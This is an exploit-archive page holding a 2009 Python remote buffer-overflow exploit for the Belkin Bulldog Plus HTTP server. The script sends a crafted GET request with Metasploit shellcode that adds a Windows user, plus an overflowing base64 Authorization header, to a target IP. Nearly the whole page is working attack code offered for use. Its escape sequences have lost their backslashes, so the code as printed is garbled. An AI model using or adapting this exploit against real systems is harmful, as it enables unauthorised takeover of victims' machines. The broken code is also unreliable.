Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
# Published : 2009-04-27
# Author : His0k4
# Previous Title : POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)
# Next Title : Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit

#!/usr/bin/python
# _  _   _         __    _     _ _  
#| || | (_)  ___  /    | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  __/  |__   |_| 
#
#[*] Usage   : belkin.py [victime_ip]
#[*] Bug     : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
#[*] Credits go to : Elazar Broad
#[*] Tested on :    Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com
#[*] Chabiba wa sayd el ba7ri :D

import sys, socket
import base64

host = sys.argv[1] 
port = 80

# win32_adduser -  PASS=27 EXITFUNC=seh USER=DZ Size=477 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x30x42x50x42x30x4bx38x45x34x4ex43x4bx58x4ex37"
"x45x50x4ax47x41x30x4fx4ex4bx38x4fx34x4ax31x4bx58"
"x4fx35x42x42x41x30x4bx4ex49x54x4bx48x46x33x4bx48"
"x41x50x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x45x46x32x46x30x45x57x45x4ex4bx48"
"x4fx45x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx34"
"x4bx58x4fx35x4ex31x41x30x4bx4ex4bx38x4ex41x4bx38"
"x41x30x4bx4ex49x38x4ex55x46x42x46x30x43x4cx41x53"
"x42x4cx46x46x4bx48x42x34x42x53x45x48x42x4cx4ax37"
"x4ex30x4bx58x42x34x4ex30x4bx48x42x57x4ex41x4dx4a"
"x4bx38x4ax46x4ax50x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x30x42x50x4bx48x4ax46x4ex53x4fx45x41x53"
"x48x4fx42x46x48x45x49x38x4ax4fx43x58x42x4cx4bx37"
"x42x35x4ax36x42x4fx4cx38x46x50x4fx55x4ax56x4ax39"
"x50x4fx4cx48x50x30x47x45x4fx4fx47x4ex43x56x4dx56"
"x46x56x50x32x45x56x4ax57x45x36x42x32x4fx52x43x56"
"x42x52x50x36x45x46x46x57x42x42x45x37x43x47x45x46"
"x44x57x42x42x46x34x4cx55x42x42x44x43x47x53x42x52"
"x4fx52x41x54x46x44x46x34x42x32x48x42x48x42x42x52"
"x50x36x45x36x46x57x42x52x4ex36x4fx56x43x56x41x46"
"x4ex56x47x36x44x57x4fx56x45x57x42x57x42x32x41x54"
"x46x36x4dx36x49x46x50x46x49x46x43x57x46x57x44x37"
"x41x46x46x37x4fx46x44x37x43x47x42x32x46x54x4cx35"
"x42x52x4fx42x41x54x46x44x46x54x42x50x5a")

jump="xFFx54x24x58" #Jump to the GET request wich contains our shellcode.

ret="xFFx17x49x7E" #Friendly jmp esp "user32.dll".

junk = "x41"*16

exploit1 = base64.encodestring(ret + jump + junk)
exploit2 = shellcode

head =  'GET '+exploit2+' HTTP/1.1rn'
head += 'Authorization: Basic '+exploit1+'rnrn'

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(head)

# www.Syue.com [2009-04-27]